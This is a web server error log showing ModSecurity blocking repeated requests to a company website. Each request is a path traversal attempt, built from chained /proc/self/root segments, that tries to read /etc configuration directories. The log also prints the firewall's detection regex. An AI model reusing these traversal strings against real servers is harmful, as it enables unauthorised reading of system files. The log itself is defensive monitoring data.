https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:30.059068 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:40414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmmuyqAr6etmhZHNr00gAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:53:30.195482 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:52856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmmuyqAr6etmhZHNr00wAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:31.485026 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:52866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmm9a6ubjKNq_cu4bKPgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:32.874032 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:52878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmnCmAPhZkrhU8w4mYOAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:34.196748 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:52892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmnuw_le52K8_3pV0ImgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:36.696043 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.241.31:52908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmoEzinOy1jxa1j4dHCgAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:38.059471 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:40768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmouyqAr6etmhZHNr04gAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:39.399290 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:40784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmo9a6ubjKNq_cu4bKRgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:39.667147 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:40784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmo9a6ubjKNq_cu4bKRwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:41.089907 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:40786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmpfu8EFLIOrSqIpstUgAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:42.459904 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:40802] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmpkzinOy1jxa1j4dHEQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:43.775295 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:40806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmpymAPhZkrhU8w4mYPwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:45.106387 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.241.31:40816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmqQbLMZ6AikZjR9XriwAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:46.410592 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:40828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmqgkwaGbbGflqUZA-xAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:47.752671 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:44690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmq-oXxyEfFpUF8f-fgQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:49.061774 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:44696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmrSmAPhZkrhU8w4mYQgAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:49.933470 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:36988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmrcdf6f5d65gmYZQA7QAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:53:50.455348 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:44702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmrimAPhZkrhU8w4mYRAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:51.775327 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.241.31:44712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmr0zinOy1jxa1j4dHFwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:53.139926 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.241.31:44722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmsQbLMZ6AikZjR9XrjwAAAAQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:54.455386 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:44728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmsta6ubjKNq_cu4bKUQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
